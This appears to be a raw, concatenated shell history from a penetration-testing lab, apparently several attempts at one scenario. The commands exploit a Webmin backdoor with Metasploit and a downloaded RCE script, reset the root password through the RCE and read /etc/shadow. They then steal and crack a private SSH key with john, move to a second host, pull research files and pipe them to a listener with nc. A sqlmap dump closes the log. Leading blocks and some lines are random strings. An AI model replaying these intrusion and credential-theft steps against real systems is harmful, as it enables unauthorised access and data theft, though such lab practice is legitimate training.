y2O0rVCjsin3d2h9F0Fp0Xvc3EHZD7ct2HvZEV6x3kUlfdWeHKuF+7wUeTJfSmvq
9+LnogQTclKAVk8htnrxBQh7aPLBAyTaXACAL31bB0ZXfh0yhJX6bXIe+EVPNaf6
rJf/WLYf6/Lmfgv/ECF+VqdLPGkLT8dEgrajh9t2TaoU+/+mxtGXaJ7Iea9I+g9l
22unE+jCDSQMF9IygWb8HfzBsruZ7IQ+/h7g7XDpEZrJf6+mdmbzBXLwlnnD1XG3
FEJ08UNnUQsuqoD+vPxunBwkFv5b/5yt0XMu9tZdXk9AW9BdasCIE1bY+au0cnTX
rjmFQ+KmCqH5lReI0Ai3fJ8pnZ2D3/m7AV/1llNaijp9NmriqK0jiVBpnEM+uH3a
WtUQOqd4QS2S8MwjPoBZ0hpXOY0JX95EvWhp58uOy0/o8yYSbb+bZe7g0+MJuF9R
Rj6xI5CiBdDo83VdQHlyaUawTlv/wUpqSRc9xsK/y2dLjzQhAD+QkWbm98jrcAGX
Tlqk1XDm0e9sNcXus5d5pnTWeCH4bnwnQDo0Ot/KljNmnG11/FXuPFnAToOq52Az
SqV4xTHhlfTZQcjVD+Rc44JkIFTr2gzDvcLOOMwcBf232/ySokL9xuMlLVc04Jy2
pG3A2vBQ1t0A62BglfKCobl9JVRwFhIIh4dzevvvtCuWnXk7AhodGIVF2XnBezou
exploit
exit
msfconsole
msfconsole
search webmin
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
msfconsole
search webmin
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
nmap 10.1.26.9
nmap 10.1.26.9 -sV
nmap 10.1.26.9 -sV -p 10000
wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py
python3 webmin-1.890_exploit.py
python3 webmin-1.890_exploit.py 10.1.26.9 10000
python3 webmin-1.890_exploit.py 10.1.26.9 10000 who
help
search webmin
use exploit/linux/http/webmin_backdoor
show options
python3 webmin-1.890_exploit.py 10.1.26.9 10000 whoami
python3 webmin-1.890_exploit.py 10.1.26.9 10000 cat /home/chong/READ-ME.txt
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'cat /home/chong/READ-ME.txt'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "est"'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "password" | passwd --stdin root'
ssh root@10.1.26.9
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'cat /etc/passwd'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'passwd -d root'
ssh root@10.1.26.9
ip a
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'passwd -S root'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'whoami'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "root:password"| chpasswd'
ssh root@10.1.26.9
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "root:password" | chpasswd'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "root:password" | chpasswd'
python3 webmin-1.890_exploit.py 10.1.26.9 10000 'echo "root:password" | chpasswd'
cat /etc/passwd
ssh root@10.1.26.9
ssh root@10.1.26.9
ssh root@10.1.26.9 -vvv
ssh root@10.1.26.9 -vvv
ssh root@10.1.26.9 -vvv
ssh root@10.1.26.9 -vvv
cat /etc/passwd
ls
cat /etc/passwd
cd /home/chong/.ssh/
ls
ls -lah
cat config
ls /home/kali/.ssh
ls -la /home/kali/.ssh
cat /etc/shadow
ls -al /home/kali/.ssh
cp Y29yb25h bpk
locate
locate ssh2john
locate ssh2john
locate ssh2john
locate ssh2john
scp root@10.1.26.9:/home/chong/.ssh/Y9yb25h .
scp root@10.1.26.9:/home/chong/.ssh/* .
ls
python /usr/share/john/ssh2john.py Y29yb25h >ke.hash
cat ke.hash
locate rock
locate rockyou
locate rockyou.txt
john ke.hash
locate rockyou.txt.gz
locate rockyou.txt.gz
ls
ls
ls
ls /usr/share/wordlists/fasttrack.txt
ls -lh /usr/share/wordlists/fasttrack.txt
cat /usr/share/wordlists/fasttrack.txt
cat /usr/share/wordlists/fasttrack.txt
john ke.hash -wordlist=/usr/share/wordlists/fasttrack.txt
nc localhost
ssh chong@10.1.17.4
cd research/
ls
ssh chong@10.1.17.4 -i Y29yb25h
scp -i Y29yb25h  chong@0.1.17.4:/home/chong/research/* ./research/
scp -i Y29yb25h  chong@0.1.17.4:/home/chong/research/* ./research/
scp -i Y29yb25h  chong@0.1.17.4:/home/chong/research/* ./research/
scp -i Y29yb25h  chong@10.1.17.4:/home/chong/research/* ./research/
ls
scp -i Y29yb25h  chong@10.1.17.4:/home/chong/research/* ./research/.
mkdir research
scp -i Y29yb25h  chong@10.1.17.4:/home/chong/research/* ./research/.
nc localhost 4444
cd research
ls
cat
cat *
cat *
cat *
ll
cat research-0.data
cat research-1.data
cat research-2.data
sudo su
sudo su
ssh
ls -al /home/kali/.ssh
ssh chong@10.1.17.4 -i Y29yb25h
cd ..
cd research/
ls
cd ..
ls
ssh chong@10.1.17.4 -i Y29yb25h
cd research
vim /home/kali/.ssh/authorized_keys
su kali
cat research-19.data
sudo su
nc localhost 4444
researchers
researchers
nc localhost 4444
cd ..
re
rese
researchers
vim /home/kali/.ssh/authorized_keys
researchers
nc localhost 4444
locate researchers
whereis researchers
whereis researchers
whereis researchers
researchers
cat .bashrc
cd research
ls
cat
cat
cat *
cat *
sudo researchers
nc localhost 4444
last
last
sudo tcpdump port 22
netstat -tulpn
hostname
sudo tcpdump port 22
python3 /home/kali/recv.py & disown
researchers
researchers
researchers
cd research
cat
cat *
nc localhost 4444
nScpzsyBJCGBleyobJWSVPOSnLdHcprnpgBZbbgAhjZPpjNKPjYYDHhf
ls
cat research-1.data
cat research-2.data
cat research-3.data
cat research-4.data
cat research-19.data
nc localhost 4444
ssh chong@10.1.17.4 -i Y29yb25h
cd ..
ls
cd research/
ls
file research-0.data
cat * > cure
cat cure
ssh chong@10.1.17.4 -i Y29yb25h
ssh chong@10.1.17.4 -i Y29yb25h
ssh chong@10.1.17.4 -i Y29yb25h
cd research
cat * >cure1
ll
nc localhost 4444 < cure1
nc localhost 4444 < cure1
nc localhost 4444 < research-19.data
nc localhost 4444 < research-18.data
nc localhost 4444 < research-17.data
nc localhost 4444 < research-16.data
nc localhost 4444 < research-15.data
nc localhost 4444 < research-14.data
nc localhost 4444 < research-13.data
nc localhost 4444 < research-12.data
nc localhost 4444 < research-11.data
nc localhost 4444 < research-10.data
nc localhost 4444 < research-9.data
nc localhost 4444 < research-0.data
cd ..
cd research/
ls
ls -lah
cat .cure.data
ssh chong@10.1.17.4 -i Y29yb25h
cd research
scp -i Y29yb25h  chong@10.1.17.4:/home/chong/research/.* .
scp -i ../Y29yb25h  chong@10.1.17.4:/home/chong/research/.* .
nc localhost 4444 < .cure.data
ll
ll
ll
sudo tcpdump port 22
sudo tcpdump port 22
ip a
ip a
wget http://files.berkasimon.com/pubk
cat pubk
cd
cd .ssh
ls
nano authorized_eys
nano authorized_keys
ls
ls
ls
cat authorized_keys
nano authorized_keys
sudo tcpdump port 22
sudo tcpdump port 22
sudo cat /etc/passwd
vim /home/kali/.ssh/authorized_keys
nmap -sV 10.1.26.9
msf console
check
search webmin
use exploit/unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
cat /home/chong/READ-ME.txt
sc
ls
cd ..
ls
cd ..
ls
cd ...
cd s
cd share
cd webmin/
ls
cd ..
ls
cd c
cat calendar/
exploit
ls
su chong
ls
.bash_history
cd /home/chong
grep ssh .bash_history
cat sshlab
cd ssh lab
cat .ssh/config
scp ~/.ssh/Y29yb25h
scp ~/.ssh/Y29yb25h
scp ~/.ssh/Y29yb25h kali@10.1.135.83/home
scp chong@server:~/.ssh/Y29yb25h .
ls
cd /home/chong/.ssh
cat Y29yb25h
scp chong@server:~/.ssh/Y29yb25h .
vim Y29yb25h
nano Y26yb25h
cp $(locate ssh2john.py) .
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
cd \n
cd /usr/share/wordlists/
ls
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
cd ..
cd ..
cd ..
cd
ls
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
su root
su root
cp
cp $(locate ssh2john.py) .
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ls
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ls
nano
nano Y29yb25h
cp $(locate ssh2john.py) .
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ssh lab
cd research
ls -a
cat .cure.data
nc localhost 4444
nmap -p 10000 -sV
nmap 10.1.26.9 -p 10000 -sV
nmap -sV -p 10000 10.1.26.9
msf console
ls
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 10.1.26.9
set LHOSTS 10.1.135.83
set SSL true
ls
cat /home/chong/READ-ME.txt
exploit
set LHOST 10.1.135.83
ls
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 10.1.26.9
set LHOSTS 10.1.135.83
set LHOST 10.1.135.83
set SSL true
msfconsole
past
ls
cd /home
ls
cd chong
cd /home/chong
exploit
cd /home/chong
exploit
cd /usr/share/wordlists
ls
cat fasttrack.txt
vim Y29yb25h
cd ..
cd ..
cd ..
cd /home
cd ~
vim Y29yb25h
nano Y29yb25h
cp $(locate ssh2john.py)
ls
man cp
python Y29yb25h
python ssh2john.py Y29yb25h > Y29yb25h.hash
locate ssh2john.py
cd /home/chong/.ssh
cp $(locate ssh2john.py)
cp $(locate ssh2john.py) .
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
localhost 4444\
localhost 4444
y
exploit
msfconsole
nc localhost 4444
ifconfig
ping 10.1.26.9
nmap 10.1.26.9
clear
nmap -sp -v 10.1.26.9
nmap -sp -O -v 10.1.26.9
su
sudo nmap -O -v 10.1.26.9
sudo nmap -O -v 10.1.26.9
clear
nmap -O -v 10.1.26.9
sudo nmap -O -v 10.1.26.9
sudo nmap -p 10000 -v 10.1.26.9
nmap -p 10000 -v 10.1.26.9
nmap -p 10000 -sV -v 10.1.26.9
metasplit --version
metasploit --version
clear
help find
help use
use exploit
use exploit/unix/webapp/webmin_backdoor
show targets
msf
exit
msf
msf
msf
clear
clear
msf6
msf6
msfdb --version
sudo msfdb init
sudo msfdb init
sudo msfdb start
sudo msfdb start
msfconsole --version
msfconsole
clear
search webmin
show targets
use explot/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
check 10.1.26.9
show targets
set RHOST 10.1.26.9
show options
exploit
set LHOST 0.0.0.0
show settings
show option
show options
run
ifconfig
set LHOST eth1
run
set SSL true
msf6
msfconsole
sessions
sessions -h
run
clear
show options
sudo msfconsole
pwd
sudo msfconsole
pwd
run
ls
cd /
ls
cd home
cd kali
ls
ls
cd Download
cd Downloads
ls
run
sessions
session -i 2
sessions -i 2
sessions
sessions -i 3
pwd
pwd
ls
clear
ls
cd Desktop
ls
clear
ls
ls
sudo john
sudo john --wordlist=/usr/share/wordlists/fasttrack.txt Y29yb25h
ls
cp $(locate ssh2john.py) .
./ssh2john.py Y29yb25h
clear
cat sshkey.parsed
./ssh2john.py Y29yb25h > sshkey.parsed
ls
ls
sudo john --wordlist=/usr/share/wordlists/fasttrack.txt sshkey.parsed
ls
ls
ls
ssh chong@10.1.17.4
ssh chong@10.1.17.4
ssh chong@10.1.17.4
ssh --version
ssh -h
ssh chong@10.1.17.4
ssh chong@219.169.69.246
ssh chong@219.169.69.246
ssh chong@219.169.69.246
ssh chong@219.169.69.246
ssh chong@219.169.69.246
nmap 219.169.69.246
nmap 10.1.17.4
nmap 10.1.17.4
nmap 10.1.17.4
ssh chong@10.1.17.4
ls
ssh lab
ls
cd research
ls
clear
history
cat research-0.data
cat research-19.data
exit
history
ssh lab
ls
cd research/
ls
nc localhost 4444
researchers
ls
cat recv.py
./recv.sh
cat recv.sh
cat recv.sh
cat recv.sh
cat recv.sh
clear
./recv.sh
ls
cat nohup.out
cat nohup.out
cat nohup.out
cat nohup.out
./recv.sh
clear
cat nohup.out
ls
rm nohup.out
ls -ala
clear
ls -la
cat .cure.data
nc localhost 4444
namap -sP 10.1.26.9
nmap -sP 10.1.26.9
nmap -sV 10.1.26.9 -A
use exploit/unix/webapp/webmin_backdoor
ls
cat /home/chong/READ-ME.txt
options
set RHOSTS file:/home/chong/READ-ME.txt
set LHOST 10.1.135.83
set SSL true
exploit
set RHOSTS 10.1.26.9
exploit
ls /home/attacker
ls
cd ..
ls
pwd
cd kali
ls
ls
cd Documents
vim key
vi key
ls /usr/share/wordlists
john --wordlist=/usr/share/wordlists/fasttrack.txt -h
john --wordlist=/usr/share/wordlists/fasttrack.txt --help
ls
cd ..
ls
cd Documents
ssh2kali
ls
ssh2kali.py
cd  Documents
cd ..
python /usr/share/john/ssh2john.py key > key.hash
john --wordlist=/usr/share/wordlists/fasttrack.txt key.hash
ssh -i key chong@10.1.17.4
chmod 700 key
ls
cd research/
ls
cat research-0.data
cat research-10.data
ls
cat research-1.data
cat research-19.data
nc localhost 4444
nc localhost 4444
cat research-0.data
ulGhGyzYACGRpXknshrKEJnShDUuMbXjaRFGnJHRpBMPk\nmVBEZJbgTwVduVbOXnqeCTQoomrvYsnEwRXVDeiobYIvENYpErdtWOCzBcxOQFFeMVWqwbTeBz\nyCZMebsNIQksiuQygOyaWZOdtBihTiYZTzjBBIvpRLP\nuEjmhzirkRzFheIADMJxCXGLlkPuUCyLksQUVVVoTkklntpTsgddSMzHApUBAvlXYBYwvkeZHsla\nxJVvlitOgdAnDtUrOyMxMUQSCiNdxBwtfjlpmqfJSYvQPOVmbnDvxuBchAzUnKJTHfmzxhHysZtFf\njmnDjnaRRiWoeSsMOFhsNkayhMJWeqKzgPZIIFuzUAbmfHAVCVTqHriQrLFxIvfcHKP\nfleNZyChLfodlytCnajjKpldnmMqinABHHpsYGAAxIYzAyzxUuIkgYvwzziBGrXTIbtDpKNqyxrOjQD\nuJfIMTTaxEjsFYujHXHQIsTceuwNrnENftVaxNhvwRfPpZdGsWfDoFEJsxP\nftAAdNovYSzKDYPRsfmcSKDbVADbBZNvcFVSVigIrfIBSExhPHlVqHeHmwjpEZ\nIVicSKjSBFvXjhIuHbgKOsiLqEWgDQBUGWtzqAQzgVndOVsQyScaSgfHwZrgy
cat research-* > out
cat out
nc localhost 4444
ls -a
ls -a
cat .cure.data
nc localhost 4444
nmap -h
nmap 10.1.26.9
nmap 10.1.26.9 -p10000
nmap 10.1.26.9 -p 10000
nmap 10.1.26.9 -p 10000 -sV
nmap 10.1.26.9 -sV  -p10000
nmap 10.1.26.9  -p10000 -sV
nmap 10.1.26.9  -p10000 -sV
nmap 10.1.26.9  -p10000 -sV
nmap 10.1.26.9  -p10000 -sV
nmap 10.1.26.9  -p10000 -sV
msfonsole
mscfonsole
msfconsole - h
msfconsole -h
msfconsole -h
use exploit/unix/webapp/webmin/backdoor
set RHOST 10.1.26.9
LHOST 10.1.135.83
set LHOST 10.1.135.83
set SSL true
set RHOST 10.1.26.9
use exploit/unix/webapp/webmin/backdoor
:q
use exploit/unix/webapp/webmin/backdoor
msfconsole use exploit/unix/webapp/webmin/backdoor
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
use exploit/unix/webapp/webmin/backdoor
use ..exploit/unix/webapp/webmin/backdoor
use /exploit/unix/webapp/webmin/backdoor
use ./exploit/unix/webapp/webmin/backdoor
exploit
msfconsole use exploit/unix/webapp/webmin/backdoor
use exploit/unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
msfconsole use exploit/unix/webapp/webmin/backdoor
cat /home/chong/READ-ME.txt
cd .bash_history
ls
cd ~/.bash_history
less /.bash_history
less .bash_history
less ~/.bash_history
cd /home/chong/.ssh
cd /home/chong
exploit
cd /home/chong
grep ssh .bash_history
cat .ssh/config
cd ~/usr/share/wordlist
cd ~/usr/
cd ../usr/
cd ~/
ls
ls
cd ./
ls
cd ../
ls
cd /home/chong/.ssh
cat Y29yb25h
ls
vim Y29yb25h
vim
nano Y29yb25h
cp $(locate ssh2john.py) .
python ssh@john.py Y29yb25h > Y29yb25h.hash
cp $(locate ssh2john.py) .
python ssh2john.py Y29yb25h > Y29yb25h.hash
john Y29yb25h.hash -- wordlist=/usr/share/wordlists/fasttrack.txt
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
john Y29yb25h.hash --wordlist=/usr/share/wordlists/fasttrack.txt
nano /usr/share/wordlists/fasttrack.txt
nano /usr/share/wordlists/fasttrack.txt
su chong
ssh lab
cd research
ls -a
car .cure-data
cat .cure.data
ls
nc localhost $$$$
nc localhost 4444
nc localhost 4444
ping 10.1.26.9
ping 10.1.26.9
nmap -sp 10.1.26.9
nmap -O 10.1.26.9
nmap -p 80 10.1.26.9
nmap 10.1.26.9
nmap -p 10000 10.1.26.9
nmap -p 10000 10.1.26.9
nmap -p 10000 10.1.26.9
nmap -sV 10.1.26.9
help
check 10.1.26.9/10000
check
banner
use
use exploit/unix/webapp/webmin_backdoor
check
exploit -j
exploit
set RHOST 10.1.26.9
localhost
set LHOST 10.1.135.83
set SSL true
localhost
localhost
localhost
localhost
usr
usr
usr
cd usr
cd /usr/share
cd wordlists
ls
cat fasttrack.txt
ls
cd usr/share/john
cd usr/share/john
cd ../
cd john
ls
cd ../
cd ../
cd ../
ls
cd usr
ls
cd local
ls
ls
ls
cd Desktop
python sshjohn.py "asd" > "john_rsa"
python sshjohn.py "asd" > "john_rsa"
python sshjohn.py "asd" > "john_rsa"
nmap
metasploit
msf
help
nmap 10.1.26.9
nmap 10.1.26.9 -p 10000 -sV
show targets
quit
msf
use exploit/linux/http/webmin_backdoor
show targets
run
set RHOSTS 10.1.26.9/10000
run
set RHOSTS 10.1.26.9
show options
run
exploit
set lhost localhost
exploit
set LHOST 10.1.135.83
set SSL true
cat .bash_history
ls
cd ..
cd ..
cd ..
ls
echo $HISTFILE
cat /root/.bash_history
cd /root
ls
cat .bash_history
ls
cd /
ls
cd home
ls
cd chong
ls
history
sudo less /root/.bash_history
cd ..
cd ..
ls
cd /root
ls
cd ..
tail /var/log/auth.log
cat /var/log/auth.log
ls
cd /home
ls
cd chong
ls
sudo cat .bash_history
sudo cat .bash_history | grep "ssh"
find . lab
cd ..
cd..
cd ..
cd ssh
find . -name lab
cat /.ssh/config
sudo cat /.ssh/config
sudo cat ~/.ssh/config
cat /etc/ssh/ssh_config
ls /.ssh/
sudo ls /.ssh
cat .ssh
cd /home
ls
cd chong
ls
cat /.ssh
sudo cat .ssh/config
cat ~/.ssh/Y29yb25h
sudo cat ~/.ssh/Y29yb25h
sudo cat .ssh/Y29yb25h
sudo cat /.ssh/Y29yb25h
msf
ls
ls Downloads
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/ssh2john.py
ls
python
touch sshtocrack
vim sshtocrack
python ssh2john.py sshtocrack > tocrack
john --wordlist=/usr/share/wordlists/fasttrack.txt tocrack
ssh lab
ssh -i sshtocrack chong@10.1.17.4
ssh -i sshtocrack chong@10.1.17.4
chmod 775 sshtocrack
ssh -i sshtocrack chong@10.1.17.4
chmod 400 sshtocrack
ls
cd research/
ls
cat research-0.data
cat research-2.data
cat research-3.data
cat research-4.data
cat research-5.data
cat research-6.data
cat research-7.data
cat research-8.data
cat research-19.data
cat research-18.data
cat research-17.data
cat research-16.data
cat research-15.data
cat research-14.data
cat research-13.data
cat research-12.data
cat research-11.data
cat research-10.data
cat research-9.data
nc localhost 4444
nc localhost 4444
nFckqMhVYwYHrfumNeujwTypEErJqfOzEotNPblwh\nAErDVyasmvfCEaAlqfsodHipGqeehQmapBlvGofIlIUFPuVRIhqyNgFAZypMeECz\nHfFtRVaXTMRvaDflXlDGRjPqWfJwUJFdmgcbbhUYWapixxENnyQa\nCLgRPSjkRsgPYwZjagiEsDTppjScGYKcihVldlCvWFQkwPeQnnbgsPnWRrgHHopHYChj\nEJfPapFJpmaJLfMYwdftSNUfEAcqPUClKTkzUsVPYANF\nNydyczFEovUIOIkVOfsQKGgfzVVcuYSBNTXkKItJBnZMawJf\nmHZGNAivDHGxYcSMCVSybEvKCIttNQPVXgtXhrXrPoXBiYFjrkQQlmcEIiQytYqYdZeihyzr\nfJcjPXtEQnZdqHrbtubbQhMvslFQIvvlmZWXLJGLPUzFkKAadH\nBNYEIHBLEVaJoKvZfHqwfYzTAJEVoNSIRJXcfgtOKitwNDqtzuox\nnbjsjnhHZcZgPbtjmIDzuWBcXvSUrjljYDzEynOBQEnRDTMNWXFb\nrnrJQXgrMPIELhinFkjsZkoKkHPTNSKVwVepijWZpahluTVFMD\nDkwoayCAseSglXhnYSdBpSRRvEoHAQkWrqotzvNYmsKfUOSwoiw\nCuXbtfBiDIRynOkuzAbrixRZGFnnnvqLFyjfLnvzHexyGIOIVVYLFXVlAcjPQTRxcn\nMXlJenWBeApJvWkdbw
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
ls
cat cure
ls -a
cat .cure.data
nc localhost 4444
nmap
nmap -v -sn 10.1.26.9.
nmap -v -sn 10.1.26.9
nmap -vv 10.1.26.9
nmap 10.1.26.9
nmap -V 10.1.26.9
nmap -v -A 10.1.26.9
nmap -v -A 10.1.26.9
nmap -v -A 10.1.26.9
nmap -v -A 10.1.26.9
nmap -v -A 10.1.26.9
nmap -v -A 10.1.26.9
shell
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
use
use
use exploit/unix/webapp/webmin_backdoor
/home/chong/READ-ME.txt
use
?
exploit
exploit/unix/webapp/webmin_backdoor
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
shell
nano /home/chong/READ-ME.txt\n
cat /home/chong/READ-ME.txt
nano /home/chong/READ-ME.txt\n
history
history
cat /home/chong/.bash_history
grep --help
grep /home/chong/.bash_history
grep -i "ssh" /home/chong/.bash_history
cat /home/chong/.ssh
cat /home/chong/.ssh/
cd /home/chong/.ssh/
ls
cat 0hRGen1s
cat config
john
cp /home/chong/.ssh/Y29yb25h /home/kali/
cp /home/chong/.ssh/Y29yb25h /home/kali
nano /home/chong/READ-ME.txt\n
ls
scp root@server:/home/chong/.ssh/Y29yb25h /home/kali/
cat Y29yb25h
ls
ssh2john.py sshkey.txt
./ssh2john.py sshkey.txt
.ssh2john.py sshkey.txt
ssh2john.py
./ssh2john.py
./ssh2john.py
./ssh2john.py
./ssh2john.py sshkey.txt
john --wordlists=/fasttrack.txt --rules converted.txt
john --wordlists=./fasttrack.txt --rules converted.txt
john --wordlist=/fasttrack.txt --rules converted.txt
john --wordlist=fasttrack.txt --rules converted.txt
./ssh2john.py
cd ..
ls
cd research
ssh lab
nc localhost 4444
cd ..
ls
nc localhost 4444
su chong
su chongg
su chong
ssh lab
ls
cd research
ls
cat research-0.data
nc localhost 4444
cat .cure
ls -a
cat .cure.data
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
researchers
nc localhost 4444
nc localhost 4444
shell
shell
nc localhost 4444
researchers
nc localhost 4444
nc localhost 4444
nc localhost 4444
su root
su root
nc localhost 4444
researchers
nc localhost 4444
researchers
./researchers
nc localhost 4444
john --wordlist=fasttrack.txt --rules converted.txt
nc localhost 4444
nc localhost 4444
nc localhost 4444
scan
ls
recv.sh
./recv
./recv.sh
bash recv.sh
./recv.sh
nmap
nmap -v -sn 10.1.26.9
nmap 10.1.26.9
nmap -sV 10.1.26.9
nmap -sV 10.1.26.9
nmap -sV 10.1.26.9
nmap -sC 10.1.26.9
nmap -sC 10.1.26.9 -p 10000
nmap -sV 10.1.26.9 -p 10000
nmap -p 10000 -sV 10.1.26.9
nmap -A  10.1.26.9
nmap -sV -p 10000 10.1.26.9
nmap -sV -p 10.1.26.9 10000
nmap 10.1.26.9 -p 10000 -sV
apt list --installed
use exploit/unix/webapp/webmib_backdoor
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
ls
cd home/chong
cd home/chong
cd home/chong
history
exploit
history
history
cd home/chong
history
cd home/chong
ls
exploit
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
exploit
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
ls
ears.cd home/chong
grep ssh .bash_history
cd /home/chong
grep ssh .bash_history
ssh lab
cat .ssh/config
cd ./ssj
cd ./ssh
cd ssh
ls
exploit
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
ls
cd /home/chong/.ssh
cat Y29yb25h
vum Y29yb25h
vim Y29yb25h
ssh 10.1.26.9
vim Y29yb25h
ls
cp $(locate ssh2john.py)
cp $(locate ssh2john.py) .
python ssh2john.py file > file.hash
python ssh2john.py file > file.hash
python ssh2john.py file > file.hash
python ssh2john.py file > file.hash
john file.hash --wordlist=/usr/share/wordlist/fasttrack.txt
john file.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ssh 10.1.26.9
nc localhost 4444
exploit
clear
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
ls
su chong
ssh lab
cd research
ls -a
cat .cure.data
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nc localhost 4444
nmap ...
nmap -v -A ...
nmap -v -A 10#010.1.26.9
nmap -v -A ...~
nmap -v -A 10.1.26.9
nikto -h 10.1.26.9
nikto -h 10.1.26.9 -p #033[2~#033[2~
nikto -h ... -p 10000
nikto -h ... -p 10000
nikto -h 10.1.26.9 -p 10000
man metasploit
msf
~msfconsole
msfconsole
hosts -a 10.1.26.9
hosts
connect 10.1.26.9
use exploit/unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set RPORT 10000
connect
set SSL true
exploit
set LHOST 10.1.135.83
cd /home/chong; ls
head -n  READ-ME.txt
head -n 1 READ-ME.txt
cat .bash_history | grep ssh
ls -a
cd .ssh
ls
cat config
ls
catY29yb25h
cat Y29yb25h
vim .key
cd /etc/share/wordlists
cd /usr/share/wordlists
ls
john .key -wordlist=/usr/share/wordlist/fasttrack.txt
ls
cp $(locate sshjohn.py) .
cp $(locate ssh2john.py) .
ls
john .key -wordlist=/usr/share/wordlist/fasttrack.txt
python ssh2john.py .ket > .keyj
john .keyj -wordlist=/usr/share/wordlist/fasttrack.txt
python ssh2john.py .key > .keyj
john .keyj -wordlist=/usr/share/wordlist/fasttrack.txt
john .keyj -wordlist=/usr/share/wordlists/fasttrack.txt
cat config
.ssh chong:..
ssh chong:10.1.17.4
ssh chong@10.1.17.4
ssh chong@10.1.17.4
h chong@N
researchers
ssh chong@lab
cd ..
ssh chong@lab
cd .ssh
ls
ess config
cat config
ssh chong@
ssh chong@147.251.48.1
su - chong
ssh chong@server
ssh chong@lab
nc localhost
nc localhost 4444
ls
cd research
ls
cat  *  |  grep cure
ls -a
cat .cure.data
wpscan -h
nmap 10.1.26.9
nmap -A 10.1.26.9
wpsan 10.1.26.9
wpscan 10.1.26.9
nmap 10.1.26.9 -sV
commix -help
commix
msfconsole
use webmin_backdoor
show targets
show options
set rhosts 10.1.26.9
set rport 1000
run
set lport 1000
set lhosts 10.1.26.9
run
set lhost 10.1.26.9
run
set lhost 10.1.135.83
set ssl true
run
set lport 4444
run
show options
msfconsole
use webmin_backdoor
show options
set rhosts 10.1.26.9
set ssl true
show options
set lhost 10.1.135.83
vim Y29yb25h
cp $(locate ssh2john.py)
cp $(locate ssh2john\.py)
ssh lab
su chong
man nmap
man nmap
nmap -sL 10.1.26.9
nmap 10.1.26.9
nmap -p 10000
nmap -sV -p 10000 10.1.26.9
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOSTS 10.1.26.9
run
set LHOST 10.1.135.83
run
show options
set SSL true
cd ..
cd ..
cd ..
ls
cd home
cd chong
ls
cat READ-ME.txt
ls
cd ..
ls
cd ..
ls
ls -a
cd /home/chong
ls -a
cat .bash_history
grep ssh
run
cd ~
cd /home/chong
cat .bash_history | grep ssh
cat .ssh
cd .ssh
ls
ls -a
cat config
su chong
ssh lab
man john
cat Y29yb25h
ls
touch peso
vim peso
cat peso
man john
cd /usr
ls
cd share
ls
cd john
ls
python ssh2john.py
python ssh2john.py ~/peso
python ssh2john.py ~/peso > peso2
john peso2 --wordlists=/usr/share/worldlists/fasttrack.txt
john peso2 --wordlist=/usr/share/worldlists/fasttrack.txt
ls
ls /usr/share/wordlist
ls /usr/share/wordlist/
ls /usr/share/wordlists/
john peso2 --wordlist=/usr/share/wordlists/fasttrack.txt
ssh lab
ls
cd research/
ls
man grep
man grep
grep
grep cure *
grep Cure *
ls -a
cat .cure.data
nc localhost 4444
root
cd pwlist.txt
dir
cd Downloads
dir
cd Documents
cd -
dir
cd -
cd -
dir
cd Documents
dir
cd /
dir
cd root
dir
cd pwdlist.txt
'pwdlist.txt'
"pwdlist.txt"
cat pwdlist.txt
cd sqlmap
sqlmap
-h
sqlmap -h
sqlmap u- server/login.php --dumb
sqlmap u- server/login.php --dump
sqlmap -u  server/login.php --dump
sqlmap -u  server/login.php --dump /root/pwdlist.txt
